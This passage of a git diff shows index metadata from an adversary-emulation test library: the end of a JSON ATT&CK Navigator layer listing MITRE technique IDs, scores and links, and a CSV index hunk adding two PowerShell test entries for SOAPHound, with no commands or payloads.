Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1a0a2da848..9aef64ae14 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -934,6 +934,8 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,SOAPHound - Dump BloodHound Data,6a5b2a50-d037-4879-bf01-43d4d6cbf73f,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,SOAPHound - Build Cache,4099086c-1470-4223-8085-8186e1ed5948,powershell execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash 